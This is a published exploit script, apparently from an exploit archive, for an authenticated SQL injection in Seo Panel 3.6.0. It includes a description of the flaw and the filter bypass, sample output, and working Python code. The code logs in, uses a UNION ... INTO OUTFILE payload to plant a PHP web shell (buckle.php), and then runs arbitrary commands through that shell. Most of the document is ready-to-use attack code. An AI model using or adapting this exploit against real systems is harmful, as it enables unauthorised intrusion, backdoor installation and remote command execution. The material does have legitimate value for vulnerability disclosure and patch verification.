# Exploit Title: Seo Control Panel 3.6.0 Authenticated Sql Injection
# Date: 10/10/2014
# Exploit Author: Tiago Carvalho tcarvalho@dognaedis.com or tiago.alexandre@gmail.com
# Vendor Homepage: www.seopanel.in
# Software Link: http://www.seopanel.in/spdownload/
# Version: Seo Panel Version 3.6.0
# Tested on: Kali Linux and MAC OS X Mavericks
# OSVDB ID: Requested
"""
This vulnerability affects Seo Control Panel -
Product: Seo Panel Version 3.6.0
Tested on PHP 5.4.4-14+deb7u14
Vendor url :http://www.seopanel.in/
Their are multiple vulnerabilitis in the project not all of them are
exploitable
The Flowing exploit is able to successfull bypass the implemented
protections based on set of regex with along with a blacklist
the protections are implemeted in the flowing file:

file : includes/sp-load.php
lines: 128 to 150

The protection can easly be bypassed with payload used by this exploit

The Vulnerable method exploited is located at:
file: seo-plugins.php
method: __getSeoPluginInfo
lines: 175 to 178
Due to incorrect use of database client api

$ python seopanel.py e 127.0.0.1 /seopanel/ spadmin spadmin
[*] Upload was successfull!

$ python seopanel.py c 127.0.0.1 /seopanel/ "ls -la"
total 12
drwxrwxrwx 2 root root 4096 Oct 9 18:06 .
drwxr-xr-x 14 root root 4096 Oct 9 11:31 ..
- -rw-rw-rw- 1 mysql mysql 42 Oct 9 18:06 buckle.php
"""

#!/usr/bin/env python
import sys
import urllib2
import urllib
import cookielib
"""
	This vulnerability affects Seo Control Panel - 
	Product: Seo Panel Version 3.6.0 
	Tested on PHP 5.4.4-14+deb7u14
	Vendor url :http://www.seopanel.in/
	Their are multiple vulnerabilitis in the project not all of them are exploitable
	The Flowing exploit is able to successfull bypass the implemented protections based on set of regex with along with a blacklist
	the protections are implemeted in the flowing file:
	
	file : includes/sp-load.php 
	lines: 128 to 150
	
	The protection can easly be bypassed with payload used by this exploit

	The Vulnerable method exploited is located at: 
	file: seo-plugins.php 
	method: __getSeoPluginInfo
	lines: 175 to 178
	Due to incorrect use of database client api 

	$ python seopanel.py e 127.0.0.1 /seopanel/ spadmin spadmin
	[*] Upload was successfull!
	
	$ python seopanel.py c 127.0.0.1 /seopanel/ "ls -la"
	total 12
	drwxrwxrwx  2 root  root  4096 Oct  9 18:06 .
	drwxr-xr-x 14 root  root  4096 Oct  9 11:31 ..
	-rw-rw-rw-  1 mysql mysql   42 Oct  9 18:06 buckle.php

"""
def exploit(host,path,username,password):
    #POST Login content type
    headers = {'Content-type': 'application/x-www-form-urlencoded'}

    #payload creates a file in project_dir/tmp
    payload = {'pid':'\' UNION/**/select/**/\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',"\<\?php system($_REQUEST[\'cmd\']);\?\>"/**/from/**/seoplugins/**/into/**/outfile/**/\'/var/www/seopanel/tmp/buckle.php'}

    base_url = "http://"+host+path
	
	#url
    post_args = {'userName': username, 'password': password,'sec':'login','referer':base_url,'login':'Sign In >>'}

    #login url
    url_login = base_url+"/login.php"

    #vulnerable url
    url_plugins = base_url+"/seo-plugins.php"

    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    request = urllib2.Request(url_login)
    request.add_data(urllib.urlencode(post_args))
    request.add_header('Content-type', 'application/x-www-form-urlencoded')
    login_request = opener.open(request)

    code = int(login_request.code)
    if code == 200:
    	try:
    		##The server returns a http status 500 but even when the attack is successfull
    		opener.open(url_plugins,urllib.urlencode(payload))
    	except Exception, e:
    		if check(base_url) == True:
    			print "[*] Upload was successfull!"

#call uploaded backdore and execute requested command
def shell(url,command):
	url_shell = url+'/tmp/buckle.php'
	encoded_args = urllib.urlencode({'cmd':command})
	return urllib2.urlopen(url_shell, encoded_args)
	

#call uploaded backdore execute requested command and print the result
def cmd(host,path,command):
	url = "http://"+host+path
	print shell(url,command).read()

#check uploaded backdore is in place 
def check(url):
	code = shell(url,"ls").code
	if(code == 200):
		return True
	else:
		return False

if len(sys.argv) == 6:
	if str(sys.argv[1]) == "e":
		exploit(str(sys.argv[2]),str(sys.argv[3]),str(sys.argv[4]),str(sys.argv[5]))

if len(sys.argv) == 5:
	if str(sys.argv[1]) == "c":
		cmd(str(sys.argv[2]),str(sys.argv[3]),str(sys.argv[4]))

